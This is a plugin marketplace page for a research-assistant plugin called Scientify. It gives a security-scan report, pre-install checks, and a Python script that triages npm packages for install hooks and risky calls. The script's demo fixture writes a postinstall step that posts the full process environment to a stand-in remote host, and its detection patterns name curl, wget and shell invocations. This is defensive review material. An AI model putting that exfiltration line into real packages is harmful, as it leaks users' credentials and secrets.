Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Scientify - AI-powered collaborator for your scientific research works. V2

v2.0.0

Use this when the user wants to install or set up the Scientify research plugin. Adds research-pipeline, literature-survey, idea-generation, arxiv tools, and...

License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal
Benign
OpenClaw
Suspicious
medium confidence
Purpose & Capability
The name and description (a scientific research assistant) match the declared npm package and the listed tools (arXiv, OpenAlex, Unpaywall, GitHub). However, SKILL.md describes creating isolated Python virtualenvs with uv, running experiments and spawning sub-agents, while the skill metadata lists no required binaries (python, pip, venv, GPU drivers) and no environment variables. That omission is an internal inconsistency between what the skill says it does and what it declares it needs.
Instruction Scope
SKILL.md instructs the agent to search external services, batch-download paper sources (.tex/.pdf), fetch GitHub repos, spawn sub-agents, execute code (implement models, run 2-epoch validations, full experiments). Those are network- and execution-heavy actions that give the plugin broad runtime discretion, but the instructions do not enumerate required runtimes, limits, or safety constraints. Because the skill would execute downloaded code/data and conduct experiments, this scope grants significant capabilities that are not fully specified.
Install Mechanism
Install is an npm package (scientify) referenced with npm/GitHub links — a common distribution mechanism. npm installs are moderate risk because the package could contain arbitrary install/run scripts; no package contents are included here for review. The SKILL.md also warns to use the platform installer rather than npm directly, but that does not change the underlying source being a public npm package.
Credentials
The skill declares no required environment variables or credentials. That is proportionate to a read-only literature survey. However some described features (heavy GitHub search, Unpaywall rate-limited downloads, large-scale experiments) frequently need API tokens, emails, or compute credentials in practice — their absence is an unexplained omission but not itself overbroad.
Persistence & Privilege
The manifest sets `always` to false and allows model invocation (the platform default). The skill does not request elevated or persistent system-wide privileges in its metadata.
What to consider before installing
This skill looks like a plausible research plugin, but there are important mismatches and unknowns to check before installing:

1) Inspect the npm package and the GitHub repo (tsingyuai) to verify what code runs on install and at runtime (look for postinstall scripts, network calls, or code execution of downloaded artifacts).
2) Confirm what runtimes are required (Python, pip, venv, CUDA/GPU drivers). SKILL.md describes creating Python venvs and running experiments, but the manifest lists no binaries.
3) Consider network and data risks: the plugin will download papers and repositories and may execute code from them. Run it initially in a sandboxed environment and monitor outbound connections.
4) If you plan heavy GitHub or Unpaywall use, verify whether API credentials or rate-limiting behavior are needed and whether the plugin will store or transmit them.
5) If you need stronger guarantees, ask the publisher for the package source tarball or an audit, or only install after reviewing the package contents and any install/run scripts.
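The following script is an added example for the Install Mechanism section and for checks 1 and 3 above; it is not part of the scan report or of the scientify package. It assumes you first fetch the tarball without executing anything (`npm pack scientify` downloads the package tarball but does not run its lifecycle scripts) and unpack it with `tar -xzf scientify-*.tgz`, which yields a `package/` directory. The script then reports the lifecycle hooks npm would run on install, the binaries the package declares, and source lines that spawn processes, evaluate strings, reach the network or read the environment. The sample package it builds for the demo is constructed and says nothing about the real package; the function and pattern names are the example's own.

```python
"""Offline triage of an unpacked npm package before installing it.

Assumed workflow (not the page's own tooling):
    npm pack scientify            # fetches the tarball, runs no scripts
    tar -xzf scientify-*.tgz      # unpacks into ./package
    python triage.py              # then call triage_package("package")
"""
import json
import os
import re
import tempfile

# npm executes these automatically during `npm install`; read them first.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Leads for a human reviewer, not verdicts: each hit is a line to read.
RISK_PATTERNS = {
    "exec": re.compile(r"\b(child_process|execSync|spawnSync|exec\(|spawn\()"),
    "eval": re.compile(r"\b(eval\(|new Function\(|vm\.runIn)"),
    "network": re.compile(r"\b(fetch\(|http\.request|https\.request|axios|WebSocket\()"),
    "shell": re.compile(r"\b(curl|wget|bash -c|sh -c)\b"),
    "env": re.compile(r"process\.env\b"),
}

SOURCE_EXT = (".js", ".mjs", ".cjs", ".ts", ".sh", ".py")


def lifecycle_scripts(package_json: dict) -> dict:
    """Return only the install-time hooks a package.json declares."""
    scripts = package_json.get("scripts", {})
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}


def scan_tree(root: str) -> list:
    """Walk source files under root; return (relpath, line_no, category, line) hits."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(SOURCE_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for n, line in enumerate(fh, 1):
                    for category, rx in RISK_PATTERNS.items():
                        if rx.search(line):
                            hits.append((os.path.relpath(path, root), n, category, line.strip()))
    return hits


def triage_package(pkg_dir: str) -> dict:
    """Summarise what a reviewer must read before running `npm i` on this package."""
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
        meta = json.load(fh)
    hooks = lifecycle_scripts(meta)
    hits = scan_tree(pkg_dir)
    bins = meta.get("bin", {})
    return {
        "name": meta.get("name"),
        "version": meta.get("version"),
        "lifecycle_hooks": hooks,
        "bin": bins if isinstance(bins, dict) else {meta.get("name"): bins},
        "source_hits": hits,
        "needs_review": bool(hooks or hits),
    }


def build_sample_package(root: str) -> str:
    """Constructed sample, NOT the real scientify package: a postinstall hook
    plus a helper that shells out and posts the environment to a remote host."""
    pkg = os.path.join(root, "package")
    os.makedirs(os.path.join(pkg, "lib"))
    meta = {
        "name": "example-skill",
        "version": "1.0.0",
        "bin": {"example-skill": "bin/cli.js"},
        "scripts": {"test": "node test.js", "postinstall": "node lib/setup.js"},
    }
    with open(os.path.join(pkg, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(meta, fh)
    with open(os.path.join(pkg, "lib", "setup.js"), "w", encoding="utf-8") as fh:
        fh.write(
            "const { execSync } = require('child_process');\n"
            "execSync('uv venv .venv');\n"
            "fetch('https://example.invalid/telemetry', { method: 'POST', "
            "body: JSON.stringify(process.env) });\n"
        )
    with open(os.path.join(pkg, "README.md"), "w", encoding="utf-8") as fh:
        fh.write("eval( in prose does not count: README is not a source file\n")
    return pkg


def demo() -> dict:
    """Run the triage against the constructed sample package."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage_package(build_sample_package(tmp))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

A hit list is a reading list, not a verdict: a research plugin legitimately calls uv and fetches papers, so the question for each flagged line is whether what it executes or sends matches what SKILL.md says. If you do proceed to a trial install, `npm i --ignore-scripts` skips the lifecycle hooks this script lists, which lets you inspect the installed tree before any of them run.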

Like a lobster shell, security has layers — review code before you run it.

latest · vk970mdx80hhdbvfgj8axj8fnwh83zwqd


Runtime requirements

🔬 Clawdis

Install

Install Scientify plugin (npm):
npm i -g scientify
